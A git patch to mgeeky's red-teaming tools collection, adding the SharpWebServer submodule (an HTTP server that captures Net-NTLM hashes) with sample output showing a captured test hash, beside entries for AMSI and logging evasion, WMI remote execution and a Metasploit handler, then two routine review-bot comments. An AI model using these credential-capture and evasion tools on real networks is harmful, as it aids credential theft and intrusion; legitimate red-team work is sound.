From b4aa1ec24ef16405941fa10722d984b2e6df94bc Mon Sep 17 00:00:00 2001 From: "Mariusz B. / mgeeky" Date: Mon, 29 Mar 2021 18:08:09 +0200 Subject: [PATCH] Added SharpWebServer --- .gitmodules | 3 +++ red-teaming/README.md | 25 +++++++++++++++++++++++++ red-teaming/SharpWebServer | 1 + 3 files changed, 29 insertions(+) create mode 160000 red-teaming/SharpWebServer diff --git a/.gitmodules b/.gitmodules index 86efee1..06c8365 100644 --- a/.gitmodules +++ b/.gitmodules @@ -52,3 +52,6 @@ [submodule "red-teaming/CobaltSplunk"] path = red-teaming/CobaltSplunk url = https://github.com/mgeeky/CobaltSplunk +[submodule "red-teaming/SharpWebServer"] + path = red-teaming/SharpWebServer + url = https://github.com/mgeeky/SharpWebServer diff --git a/red-teaming/README.md b/red-teaming/README.md index 4112540..ba8bf03 100755 --- a/red-teaming/README.md +++ b/red-teaming/README.md 
@@ -340,6 +340,31 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt - **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9)) +- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality + +``` +C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true + + :: SharpWebServer :: + a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality + +[.] Serving HTTP server on port : 8888 +[.] Will run for this long : 60 seconds +[.] Verbose mode turned on. +[.] NTLM mode turned on. +[.] Serving files from directory : C:\Windows\Temp + +SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized due to lack of Authorization header. +SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401) +SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized with NTLM Challenge Response. +SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401) + +[+] SharpWebServer: Net-NTLM hash captured: +TestUser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harpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200) +``` + - [**`SharpWMI`**](https://github.com/mgeeky/SharpWMI) - This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands. 
Initially submitted as a [Pull Request #3](https://github.com/GhostPack/SharpWMI/pull/3) to the original repo of that project, however unless it's merged there - will pin my fork here for accountability - **`Stracciatella`** - Powershell runspace from within C# (aka `SharpPick` technique) with AMSI and Script Block Logging disabled for your pleasure. diff --git a/red-teaming/SharpWebServer b/red-teaming/SharpWebServer new file mode 160000 index 0000000..8346f4b --- /dev/null +++ b/red-teaming/SharpWebServer @@ -0,0 +1 @@ +Subproject commit 8346f4bc38d53467498ec47f123b98258cb297e0
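
Review bot: In the red-teaming/README.md hunk, the sample output prints `[.] Will run for this long : 60 seconds`, but the invocation above it (`port=8888 dir=C:\Windows\Temp verbose=true ntlm=true`) passes nothing that sets a run time, so a reader cannot tell where the 60 seconds comes from. Either state in the entry that this is the default, or include the corresponding argument in the example command. The same block ends with a captured Net-NTLM hash for `TestUser`. Please confirm it was produced by a throwaway lab account or swap it for a placeholder before it lands in a public README, since a published Net-NTLM response can be attacked offline.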
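
Review bot: In the red-teaming/SharpWebServer gitlink hunk, the submodule is pinned to 8346f4bc38d53467498ec47f123b98258cb297e0, and nothing in the patch says which branch or tag that commit belongs to. Please confirm the commit is pushed to https://github.com/mgeeky/SharpWebServer and reachable from its default branch, otherwise `git submodule update --init` fails for anyone cloning this repository recursively. Pinning to an exact commit is the right choice for a tools collection. A short note in the commit message about how the pin gets bumped would help later reviewers.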